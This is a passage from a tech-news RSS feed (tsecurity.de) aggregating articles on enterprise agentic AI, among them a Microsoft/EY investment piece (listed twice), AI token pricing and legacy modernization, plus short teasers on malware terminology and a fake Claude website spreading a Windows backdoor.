agent sustain longer searches, whereas overly aggressive summarization tends to discard useful evidence.</p><p>Because of these operational realities, DCI is not meant to be a mandatory replacement for existing vector infrastructure. Instead, it serves as a complementary one.</p><p>"For orchestration engineers and data architects, our view is that the most practical near-term deployment pattern is hybrid," the authors said. Semantic retrieval can still provide high-recall candidate discovery when a user's intent is broad or underspecified. "DCI can then operate as a precision and verification layer: the agent can search within the retrieved documents, expand from them into neighboring files, check exact constraints, and combine weak signals across documents."</p><p>The researchers have released <a href="https://github.com/DCI-Agent/DCI-Agent-Lite">the code for DCI</a> under the permissive MIT license.</p><p>"Longer term, DCI changes how we think about enterprise data. Data will not only need to be stored for humans or indexed for search engines; it will need to be organized for agents that can inspect, compare, grep, trace, and verify," the authors conclude. "File names, timestamps, stable identifiers, metadata, version history, and machine-readable structure become part of the retrieval interface."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft, EY to spend $1 billion on helping customers buy agentic AI]]></title>
<description><![CDATA[Microsoft and EY will spend $1 billion on helping their customers adopt AI over the next five years.



The billion will support assisting clients with pioneering AI projects and capability building, said EY’s global Microsoft alliance leader, Paul Clark. Clients will be able to access those reso...]]></description>
<link>https://tsecurity.de/de/3540049/it-nachrichten/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540049/it-nachrichten/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai/</guid>
<pubDate>Fri, 22 May 2026 17:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft and EY will spend $1 billion on helping their customers adopt AI over the next five years.</p>



<p>The billion will support assisting clients with pioneering AI projects and capability building, said EY’s global Microsoft alliance leader, <a href="https://www.ey.com/en_us/people/paul-clark" target="_blank" rel="noreferrer noopener">Paul Clark</a>. Clients will be able to access those resources based on their specific needs, he said.</p>



<p>“We’re intentionally building the EY forward deployed engineer (FDE) capability through close collaboration and training with Microsoft, while maintaining integrated EY-Microsoft teams in the field,” he said in an email. “Clients will continue to experience this as one combined team, bringing together engineering depth and transformation expertise.”</p>



<p>EY has acted as “client zero” in this initiative, embedding AI in all facets of its organization while it validated ways of working with Microsoft’s technologies. After an initial trial of Microsoft Copilot with 150,000 users, it is now rolling it out through <a href="https://www.computerworld.com/article/1691110/microsoft-365-explained.html#:~:text=Starting%20May%201%2C%202026%2C%20a%20new%20Microsoft%20365%20E7%20tier%20will%20be%20available.%20At%20%2499/user/month%2C%20it%20bundles%20all%20the%20features%20of%20Microsoft%20365%20E5%20%E2%80%94%20including%20Entra%20Suite%2C%20Defender%2C%20Intune%20and%20Purview%20%E2%80%94%20with%20Microsoft%20365%20Copilot%20and%20Agent%20365.">Microsoft 365 E7</a> to all 400,000 staff.</p>



<p>Its combined offering with Microsoft will be fully integrated, with shared governance and accountability across both organizations, it said. Initial services will cover finance, tax, risk, HR and supply chain activities within the financial services, industrials and energy, consumer and retail, government, and health care sectors.</p>



<h2 class="wp-block-heading">Pain and suffering</h2>



<p>The company’s status as client zero is important here, said Greyhound Research Chief Analyst <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>. “It gives EY a proving ground, not just a reference story. The firm can test AI across its own global workforce, professional services processes and regulated client delivery environment before taking the patterns outward. That gives it a sharper commercial proposition: not ‘we understand AI’, but ‘we have suffered through the operating friction before you’. In enterprise technology, lived pain is often more valuable than polished optimism.”</p>



<p>EY is not merely reselling Microsoft’s AI story, he added. “It is positioning itself as the interpreter between Microsoft’s engineering depth and the client’s messy operational reality.”</p>



<p>Technology analyst <a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a> said the challenges of scaling AI solutions are monumental, so it makes sense for vendors to bolster their own support capabilities to allow customers to capture maximum value from their AI investment.</p>



<p>“The forward deployed engineer seems like an ideal solution to this vexing problem, a ready-made, vendor-provided, fully trained resource whose sole job is to help customers crack the AI code and turn its potential into realizable gains,” he said. “FDEs can help tune a given agentic system to the organization’s unique requirements and reduce near- and long-term risk by better aligning the vendor’s technologies to the customer’s internal systems.”</p>



<p><a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">Forward-deployed engineers</a> are having a moment, with both <a href="https://www.cio.com/article/4167981/anthropics-financial-agents-expose-forward-deployed-engineers-as-new-ai-limiting-factor.html">Anthropic</a> and <a href="https://www.cio.com/article/4169759/openais-new-ai-consulting-offering-raises-questions-of-trust-strategy.html">OpenAI</a> putting them at the forefront of their AI sales strategies.</p>



<p>But the concept isn’t new, said <a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="noreferrer noopener">Matt Kimball</a>, principal analyst at Moor Insights &amp; Strategy. “When I was a state government CIO back in the early 2000s, I leveraged what is now being called an FDE and it reduced a project from weeks to hours,” he said. FDEs should have the domain expertise to be able to “walk into an enterprise and look at all of these moving parts associated with activating AI and develop (and execute) a comprehensive plan of attack,” covering technology, operations, people, and processes, he said.</p>



<p>However, said <a href="https://www.infotech.com/profiles/bill-wong" target="_blank" rel="noreferrer noopener">Bill Wong</a>, research fellow at Info-Tech Research Group, enterprise leaders need to recognize that while they have the option to procure services to accelerate adoption, they must take ultimate responsibility for what’s built by defining, staffing and applying an AI governance program, and adapting it as AI capabilities evolve.</p>



<h2 class="wp-block-heading">Forward thinking</h2>



<p>Gogia said that many CIOs will bring in forward-deployed engineers for perfectly good reasons: scarce skills, urgency, board pressure, messy legacy systems and a widening gap between AI aspiration and operational delivery, but they should not abdicate responsibility to them.</p>



<p>“Use forward-deployed engineers where they create speed, learning and operational discipline. Do not use them as substitutes for internal architecture, governance or accountability,” he said. “Make them teach, make them document, make them transfer capability, make them design for audit, exit, and resilience from day one. If the engagement leaves behind only working software, it has not done enough.”</p>



<p><em>This article first appeared on <a href="https://www.cio.com/article/4176393/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai.html" data-type="link" data-id="https://www.cio.com/article/4176393/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft, EY to spend $1 billion on helping customers buy agentic AI]]></title>
<description><![CDATA[Microsoft and EY will spend $1 billion on helping their customers adopt AI over the next five years.



The billion will support assisting clients with pioneering AI projects and capability building, said EY’s global Microsoft alliance leader, Paul Clark. Clients will be able to access those reso...]]></description>
<link>https://tsecurity.de/de/3540022/it-security-nachrichten/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540022/it-security-nachrichten/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai/</guid>
<pubDate>Fri, 22 May 2026 17:21:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft and EY will spend $1 billion on helping their customers adopt AI over the next five years.</p>



<p>The billion will support assisting clients with pioneering AI projects and capability building, said EY’s global Microsoft alliance leader, <a href="https://www.ey.com/en_us/people/paul-clark" target="_blank" rel="nofollow">Paul Clark</a>. Clients will be able to access those resources based on their specific needs, he said.</p>



<p>“We’re intentionally building the EY forward deployed engineer (FDE) capability through close collaboration and training with Microsoft, while maintaining integrated EY-Microsoft teams in the field,” he said in an email. “Clients will continue to experience this as one combined team, bringing together engineering depth and transformation expertise.”</p>



<p>EY has acted as “client zero” in this initiative, embedding AI in all facets of its organization while it validated ways of working with Microsoft’s technologies. After an initial trial of Microsoft Copilot with 150,000 users, it is now rolling it out through <a href="https://www.computerworld.com/article/1691110/microsoft-365-explained.html#:~:text=Starting%20May%201%2C%202026%2C%20a%20new%20Microsoft%20365%20E7%20tier%20will%20be%20available.%20At%20%2499/user/month%2C%20it%20bundles%20all%20the%20features%20of%20Microsoft%20365%20E5%20%E2%80%94%20including%20Entra%20Suite%2C%20Defender%2C%20Intune%20and%20Purview%20%E2%80%94%20with%20Microsoft%20365%20Copilot%20and%20Agent%20365.">Microsoft 365 E7</a> to all 400,000 staff.</p>



<p>Its combined offering with Microsoft will be fully integrated, with shared governance and accountability across both organizations, it said. Initial services will cover finance, tax, risk, HR and supply chain activities within the financial services, industrials and energy, consumer and retail, government, and health care sectors.</p>



<h2 class="wp-block-heading">Pain and suffering</h2>



<p>The company’s status as client zero is important here, said Greyhound Research Chief Analyst <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="nofollow">Sanchit Vir Gogia</a>. “It gives EY a proving ground, not just a reference story. The firm can test AI across its own global workforce, professional services processes and regulated client delivery environment before taking the patterns outward. That gives it a sharper commercial proposition: not ‘we understand AI’, but ‘we have suffered through the operating friction before you’. In enterprise technology, lived pain is often more valuable than polished optimism.”</p>



<p>EY is not merely reselling Microsoft’s AI story, he added. “It is positioning itself as the interpreter between Microsoft’s engineering depth and the client’s messy operational reality.”</p>



<p>Technology analyst <a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="nofollow">Carmi Levy</a> said the challenges of scaling AI solutions are monumental, so it makes sense for vendors to bolster their own support capabilities to allow customers to capture maximum value from their AI investment.</p>



<p>“The forward deployed engineer seems like an ideal solution to this vexing problem, a ready-made, vendor-provided, fully trained resource whose sole job is to help customers crack the AI code and turn its potential into realizable gains,” he said. “FDEs can help tune a given agentic system to the organization’s unique requirements and reduce near- and long-term risk by better aligning the vendor’s technologies to the customer’s internal systems.”</p>



<p><a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">Forward-deployed engineers</a> are having a moment, with both <a href="https://www.cio.com/article/4167981/anthropics-financial-agents-expose-forward-deployed-engineers-as-new-ai-limiting-factor.html">Anthropic</a> and <a href="https://www.cio.com/article/4169759/openais-new-ai-consulting-offering-raises-questions-of-trust-strategy.html">OpenAI</a> putting them at the forefront of their AI sales strategies.</p>



<p>But the concept isn’t new, said <a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="nofollow">Matt Kimball</a>, principal analyst at Moor Insights &amp; Strategy. “When I was a state government CIO back in the early 2000s, I leveraged what is now being called an FDE and it reduced a project from weeks to hours,” he said. FDEs should have the domain expertise to be able to “walk into an enterprise and look at all of these moving parts associated with activating AI and develop (and execute) a comprehensive plan of attack,” covering technology, operations, people, and processes, he said.</p>



<p>However, said <a href="https://www.infotech.com/profiles/bill-wong" target="_blank" rel="nofollow">Bill Wong</a>, research fellow at Info-Tech Research Group, enterprise leaders need to recognize that while they have the option to procure services to accelerate adoption, they must take ultimate responsibility for what’s built by defining, staffing and applying an AI governance program, and adapting it as AI capabilities evolve.</p>



<h2 class="wp-block-heading">Forward thinking</h2>



<p>Gogia said that many CIOs will bring in forward-deployed engineers for perfectly good reasons: scarce skills, urgency, board pressure, messy legacy systems and a widening gap between AI aspiration and operational delivery, but they should not abdicate responsibility to them.</p>



<p>“Use forward-deployed engineers where they create speed, learning and operational discipline. Do not use them as substitutes for internal architecture, governance or accountability,” he said. “Make them teach, make them document, make them transfer capability, make them design for audit, exit, and resilience from day one. If the engagement leaves behind only working software, it has not done enough.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's what was revealed during The Warhammer Skulls Showcase 2026]]></title>
<description><![CDATA[The Warhammer Skulls Showcase 2026 has been and gone and with it plenty of announcements, updates, demos and more so read on for the details.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3538761/linux-tipps/heres-what-was-revealed-during-the-warhammer-skulls-showcase-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538761/linux-tipps/heres-what-was-revealed-during-the-warhammer-skulls-showcase-2026/</guid>
<pubDate>Fri, 22 May 2026 09:54:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Warhammer Skulls Showcase 2026 has been and gone and with it plenty of announcements, updates, demos and more so read on for the details.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1928321221id29072gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/05/heres-what-was-revealed-during-the-warhammer-skulls-showcase-2026/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Virus, Malware, or Spyware? Here’s What They Really Mean]]></title>
<description><![CDATA[  Many people casually refer to every cyber threat as a “virus,” but cybersecurity professionals use a much broader classification system. A security program that only defended against traditional computer viruses would offer very limited protection today because viruses represent…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3536978/it-security-nachrichten/virus-malware-or-spyware-heres-what-they-really-mean/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536978/it-security-nachrichten/virus-malware-or-spyware-heres-what-they-really-mean/</guid>
<pubDate>Thu, 21 May 2026 17:38:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Many people casually refer to every cyber threat as a “virus,” but cybersecurity professionals use a much broader classification system. A security program that only defended against traditional computer viruses would offer very limited protection today because viruses represent…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/virus-malware-or-spyware-heres-what-they-really-mean/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/virus-malware-or-spyware-heres-what-they-really-mean/">Virus, Malware, or Spyware? Here’s What They Really Mean</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The world of AI tokens — and why they matter]]></title>
<description><![CDATA[Google has only one way to measure the phenomenal AI growth it’s seen: in tokens.



The company processes 3.2 quadrillion tokens per month, Google CEO Sundar Pichai said during this week’s I/O keynote, adding, “never imagined I’d say quadrillion…, but here we are.”



Basically, tokens are a uni...]]></description>
<link>https://tsecurity.de/de/3535405/it-nachrichten/the-world-of-ai-tokens-and-why-they-matter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535405/it-nachrichten/the-world-of-ai-tokens-and-why-they-matter/</guid>
<pubDate>Thu, 21 May 2026 09:17:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google has only one way to measure the phenomenal AI growth it’s seen: in tokens.</p>



<p>The company processes 3.2 quadrillion tokens per month, Google CEO Sundar Pichai <a href="https://www.youtube.com/watch?v=wYSncx9zLIU" target="_blank" rel="noreferrer noopener">said during this week’s I/O keynote</a>, adding, “never imagined I’d say quadrillion…, but here we are.”</p>



<p>Basically, tokens are a unit of measure used by large language models (LLMs) to process data.</p>



<p>Tokens, which have been called the “new oil” <a href="https://www.fruitionservices.io/post/the-new-oil-ai-tokens-explained" target="_blank" rel="noreferrer noopener">fueling the AI revolution</a>, are also a way AI vendors can meter usage and price their services. Enterprises are lusting for tokens, and spending billions of them to grab compute time.</p>



<p>As with oil, the demand for tokens is seemingly insatiable — and it is straining an already short GPU supply, which in turn is increasing the cost of running AI tools.</p>



<h2 class="wp-block-heading">What exactly is a token?</h2>



<p>Similar to the way humans think, LLMs grasp the meaning of a sentence by breaking words down into tokens. Pichai described them as “the fundamental units of data our models process, many representing a problem being solved.”</p>



<p>The fundamental unit could be in the form of a word, a sub-word, or a string of letters, symbols, or phrases. Compound words can be split into multiple tokens.</p>



<p>For example, the prompt “I am running after a car” could generate “run” as one token and “ing” as the second token because it changes the meaning of the sentence. “Car” would be its own token.</p>



<p>“On average, one token is about three-quarters of a word, so 100 words works out to roughly 135 tokens,” said Deepak Seth, senior director analyst at Gartner.</p>



<h2 class="wp-block-heading">Token prices can vary</h2>



<p>Not all tokens are priced the same. An uploaded token to an AI system is cheaper, while downloaded tokens are more expensive. A user, for instance, might pay to upload a resume, then pay even more to download the resume polished by an LLM.</p>



<p>“The upload cost is less expensive than the download cost because the AI has done some work,” explained Max Leaming, head of data science and AI solutions at ManpowerGroup.</p>



<p>Token-based pricing is mainly used for enterprises and power users such as coders. Anthropic’s Claude Code and OpenAI’s Codex are priced in tokens, and Microsoft’s GitHub is <a href="https://github.blog/news-insights/company-news/github-copilot-is-moving-to-usage-based-billing/" target="_blank" rel="noreferrer noopener">adopting a form of token-based pricing starting June 1</a>.</p>



<p>The final AI bill includes the costs of tokens and computing expenses (such as GPU time).</p>



<p>ManpowerGroup pays the token cost to the model provider while compute costs ring up in parallel. (The company uses Microsoft Azure, which offers multiple LLMs, with Snowflake as its database.)</p>



<h2 class="wp-block-heading">Some LLMs can be smarter and token friendly</h2>



<p>Some AI models give better responses, which might represent a more efficient use of a token budget. Pichai said <a href="https://www.computerworld.com/article/4175283/google-is-focusing-on-autonomous-ai-agents-in-gemini-3-5-flash.html" data-type="link" data-id="https://www.computerworld.com/article/4175283/google-is-focusing-on-autonomous-ai-agents-in-gemini-3-5-flash.html">Google’s new Gemini 3.5 Flash</a> — which is priced in tokens — delivers “frontier-level capabilities at less than half the price of comparable frontier models.</p>



<p>“We’ve heard that many companies are already blowing through their annual token budgets…,” Pichai said, arguing that if companies used Flash, “they could save a lot of money. If they shifted 80% of their workloads from other frontier models to 3.5 Flash, they’d save over $1 billion annually.”</p>



<h2 class="wp-block-heading">Prompt efficiency matters</h2>



<p>Using tokens inefficiently is wasteful spending, Gartner’s Seth said. One coder might use up 10,000 tokens to get his or her work done, while another might use only 1,000. But there’s no tool to measure efficiency, Seth said.</p>



<p>“Some companies are moving towards outcome-based pricing because when people start realizing the real cost of tokens, companies will start looking at token efficiency,” Seth said.</p>



<p>With that in mind, ManpowerGroup developed a dashboard that cuts the steps for clients to get data, Leaming said. New users to an internal labor-market data tool initially needed 10 follow-up questions to drill into a query. A year later, those same users averaged four follow-ups.</p>



<p>“They’re using fewer tokens and they’re simply more efficient,” he said. “And that, in large part, has to do with your ability to prompt efficiently.”</p>



<p>But there’s a flip side. AI tools such as <a href="https://www.computerworld.com/article/4151808/leak-reveals-anthropics-mythos-a-powerful-ai-model-aimed-at-cybersecurity-use-cases-3.html" data-type="link" data-id="https://www.computerworld.com/article/4151808/leak-reveals-anthropics-mythos-a-powerful-ai-model-aimed-at-cybersecurity-use-cases-3.html">Anthropic’s controversial Mythos LLM</a> — which isn’t available publicly yet — might be priced astronomically high, though its superior reasoning could make it more efficient.</p>



<p>“Even though the per-token costs may go up, we may see overall costs go down,” Leaming said.</p>



<h2 class="wp-block-heading">AI vendors and the ‘drug dealer strategy’</h2>



<p>Top AI vendors are spending trillions to build out AI infrastructures, but they’re not charging enough on tokens, Seth said. “I feel like the OpenAIs, the Googles and the Anthropics of the world are following a drug dealer strategy: Get people addicted to AI, and then raise the price of a token,” he said.</p>



<p>AI vendors could also use free tokens as a way to lock in customers, Leaming said. Free tokens from AI vendors could incentivize companies to build processes and workflows around proprietary LLMs and agents. And as if to reinforce the effort, major AI vendors are now sending out engineers to deploy AI models at customer sites.</p>



<p>The engineers, <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html?utm=hybrid_search">better known as forward-deployed engineers</a>, or FDEs, are more or less hired guns for AI deployments. They focus on helping customers roll out AI projects successfully.</p>



<p>FDEs can study and help set strategies, put battle plans in place, build agentic frameworks, and roll out AI in conjunction with customers’ own domain experts and engineers. They also evaluate AI models, resolve context and reasoning problems, and handle security issues.  </p>



<p>OpenAI, Google, and Microsoft are moving away from LLMs as the product. “Now they want to get inside of the firm and build your infrastructure for you,” Leaming said.</p>



<h2 class="wp-block-heading">Free tokens, the next worker perk</h2>



<p>Tokens are now sometimes offered as a job perk to engineers, Nvidia CEO Jensen Huang has said. Experts compare that to when companies cover cell phone bills for their workers.</p>



<p>Leaming, who said he hasn’t seen instances of that yet, found the idea odd. But if it is happening, much depends on who is offering free tokens.</p>



<p>Employers offering free OpenAI or Microsoft tokens could represent an indirect form of vendor lock-in, he said. “Then I’m incentivized. The more I’m familiar with the product, the more I’m gonna use it.”</p>



<p>Free tokens are also a way to spur the adoption of emerging AI technologies that are not yet safe for work. Many top tech leaders, for example, are exploring <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html">the possibilities of OpenClaw</a> — considered a breakthrough AI technology — on their own dime because the technology is <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html">considered risky for enterprise environments</a>.</p>



<p>Alex Spinelli, ARM’s senior vice president for AI and developer platforms, is one such person experimenting with OpenClaw at his own cost.</p>



<p>“In my OpenClaw, when I had it configured wrong, I got a bill for $500 in one weekend, and I was like, what the hell happened here? There’s no free lunch. Tokens are expensive,” Spinelli said.</p>



<p>Gartner’s Seth compared the free-token tactic to a cigarette company in India that once gave employees boxes of cigarettes alongside their salaries. “In addition to their salaries, they used to get a couple of boxes of cigarettes. The whole intent was they will…distribute them out and just make them more popular,” he said. </p>



<p>“If you give it to them, they will use it, because now it’s in lieu of money.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond the glossy roadmap: Bridging the gap between agents and assets]]></title>
<description><![CDATA[A few months ago, I was reviewing an agentic AI roadmap with the CIO of a Fortune 500 insurer. He pulled up two slides side by side. On the left: A glossy roadmap for a new agentic AI platform — multi-agent orchestration, vector databases, the works. On the right: A 30-year-old loan origination s...]]></description>
<link>https://tsecurity.de/de/3532271/it-nachrichten/beyond-the-glossy-roadmap-bridging-the-gap-between-agents-and-assets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532271/it-nachrichten/beyond-the-glossy-roadmap-bridging-the-gap-between-agents-and-assets/</guid>
<pubDate>Wed, 20 May 2026 11:05:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A few months ago, I was reviewing an agentic AI roadmap with the CIO of a Fortune 500 insurer. He pulled up two slides side by side. On the left: A glossy roadmap for a new agentic AI platform — multi-agent orchestration, vector databases, the works. On the right: A 30-year-old loan origination system running on a mainframe his team had been “planning to retire” for the last few years.</p>



<p>“We’re spending $40 million on the left,” he said. “And the agent on the left can’t see anything on the right.”</p>



<p>That, in one sentence, is the architectural lie most enterprises are living with right now.</p>



<p>For the better part of a decade, we’ve split our IT strategy into two budgets: An innovation lab, where shiny things get built, and a maintenance core, where the actual business runs. We promote people for the first column and quietly outsource the second. Then we wonder why our <a href="https://www.cio.com/article/4130557/most-ai-strategies-will-never-become-agentic-heres-why.html">generative AI pilots can’t make it to production</a>.</p>



<p>I’ll say what most CIOs already suspect but won’t put on a slide: Your modernization strategy and your AI strategy are the same strategy. If you’re funding them as separate line items in 2026, you’re already behind.</p>



<h2 class="wp-block-heading">What I got wrong about “lift and shift”</h2>



<p>I’ll admit I was a believer for a long time. In 2022, my team finished a textbook migration off a 20-year-old Oracle Exadata footprint onto a Cloud native solution. Eighteen months, $20M, zero data loss and a 40% reduction in run-rate infrastructure cost. I had the slide ready for the board.</p>



<p>Then our first generative AI pilot landed, and I watched our agent fail to answer questions that the old database — with all its ugly stored procedures — could have answered in a single query. The “modernized” Spanner instance was clean, fast and — without the surrounding semantic layer — couldn’t answer questions the old database could.</p>



<p>The lesson I took away: Legacy systems aren’t technical debt. They’re encoded institutional memory — three decades of edge cases, compliance carve-outs, regional rules and “we tried that in 2007, and it broke everything” wisdom that nobody documented because nobody had to. You can rewrite the code. You can’t rewrite the knowledge.</p>



<p>Which is precisely why agentic AI changes the math. For the first time, we have a technology that doesn’t just tolerate that messy old context — it <em>needs</em> it.<br><br>Earlier this year, I spoke on this intersection of agentic cloud strategy and legacy modernization at <a href="https://www.googlecloudevents.com/next-vegas" rel="nofollow">Google Cloud Next 2026</a>. What follows is the framework I shared for moving beyond the “<a href="https://www.cio.com/article/4105794/beyond-lift-and-shift-using-agentic-ai-for-continuous-cloud-modernization.html">lift and shift</a>” mentality.</p>



<h2 class="wp-block-heading">MCP isn’t a protocol. It’s a peace treaty</h2>



<p>The <a href="https://www.cio.com/article/4136548/why-model-context-protocol-is-suddenly-on-every-executive-agenda.html">Model Context Protocol</a> gets discussed as a technical standard, and that framing undersells it. After watching teams burn quarters writing custom connectors between every model and every data source, I think MCP is closer to a peace treaty between two warring tribes inside the enterprise: The cloud-native engineers and the legacy custodians.</p>



<p>When an agent can pull a customer’s 2003 account history from a mainframe and combine it with a real-time fraud signal without somebody hand-coding the bridge, two things happen. The integration backlog stops growing. And — more importantly — the <em>political</em> wall between the two teams starts to crumble.</p>



<p>I’d argue this is the most under-appreciated CIO opportunity of the next 18 months. Not the agents themselves. The org chart you can finally redraw because the agents made the old separation pointless.</p>



<h2 class="wp-block-heading">Why I stopped trusting RAG for legacy code</h2>



<p>Here’s a take I’ve gotten pushback on: Standard retrieval-augmented generation is the wrong tool for legacy modernization, and we’re using it anyway because it’s familiar.</p>



<p>RAG is brilliant for documents. It’s a disaster for code. A monolithic codebase isn’t a haystack with a needle in it; it’s a tangled fishing net where every knot is connected to seven others. Ask a vanilla RAG system to help you refactor a billing module and it will confidently tell you the change is safe, right up until production goes down on a Tuesday morning.<br><br><a href="https://www.cio.com/article/4164027/startup-tackles-knowledge-graphs-to-improve-ai-accuracy.html">Andrew Moore</a>, the former head of Google Cloud AI and now co-founder of Lovelace, told CIO recently that “you cannot do safety-critical reasoning for agents purely based on trying to do the same sort of thing you normally do for chatbots.” That maps to my experience exactly. Chatbots can be wrong and embarrassing. Agents can be wrong and expensive.</p>



<p><a href="https://github.com/microsoft/graphrag" rel="nofollow">GraphRAG</a> — building a semantic knowledge graph of how the code actually behaves, not just how it reads — is the only approach I’ve seen that respects the structural reality of these systems. In 2025, I was advising on a mainframe modernization at a health insurer.  The CIO had given me the official application inventory: 47 systems, well-mapped, with named owners. We ran a graph analysis across the actual code and graph surfaced 53 systems.</p>



<p>The six extra weren’t ghosts. They were live, running and integrated — small applications written between 1998 and 2004, each owned by a business unit that had quietly built them, never registered them and treated them as “spreadsheets that happened to run on the mainframe.” One of them was processing about $35M a year in vendor rebates against pricing tables that no one in IT knew existed.</p>



<p>The graph didn’t just find undocumented dependencies. It found undocumented <em>systems</em>. You cannot modernize what you cannot see, and most enterprise application inventories are wrong by an amount that should embarrass us.</p>



<h2 class="wp-block-heading">The hard part isn’t technical</h2>



<p>Everything I’ve described is buildable today. The vendors are there. The protocols exist. The talent, if you know where to look, is hungry.</p>



<p>What’s missing is architectural courage at the CIO level — and I mean that specifically. It is much easier to fund a new AI initiative than to defend a modernization budget. The first gets a press release. The second gets a line item nobody reads. But if you keep funding them separately, you’ll end up with the same outcome I’ve watched at company after company: A sleek agentic layer floating above an integration layer that bleeds margin every quarter, while your competitors who did the unglamorous work compound advantage you can no longer catch.</p>



<p>If I could give CIOs reading this one piece of advice — and I realize this is the kind of thing that’s easy to say and hard to do — it’s this:</p>



<p>Take your top three modernization projects and your top three AI projects. Put them on the same slide. Give them the same executive sponsor. If you can’t, you don’t have a strategy. You have two parallel cost centers waving at each other.</p>



<p>The myth that legacy and innovation are opposites was always wrong. In the agentic era, it’s an unforced error. The question for the next 18 months isn’t whether to modernize. It’s whether you have the architectural clarity — and the political cover — to do it as one program instead of two.</p>



<p>I think most CIOs already know which side of that line they’re on. I’d just rather we stop pretending otherwise.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Claude AI Site Spreads New Beagle Windows Backdoor – Here’s How to Stay Safe]]></title>
<description><![CDATA[  Cybercriminals have launched a sophisticated malvertising campaign using a fake Claude‑AI website that installs a new Windows backdoor called “Beagle,” highlighting how attackers are weaponizing the popularity of AI tools against software developers. The deceptive site, reachable through sponso...]]></description>
<link>https://tsecurity.de/de/3529703/it-security-nachrichten/fake-claude-ai-site-spreads-new-beagle-windows-backdoor-heres-how-to-stay-safe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529703/it-security-nachrichten/fake-claude-ai-site-spreads-new-beagle-windows-backdoor-heres-how-to-stay-safe/</guid>
<pubDate>Tue, 19 May 2026 17:38:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Cybercriminals have launched a sophisticated malvertising campaign using a fake Claude‑AI website that installs a new Windows backdoor called “Beagle,” highlighting how attackers are weaponizing the popularity of AI tools against software developers. The deceptive site, reachable through sponsored…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-claude-ai-site-spreads-new-beagle-windows-backdoor-heres-how-to-stay-safe/">Read more →</a></p>
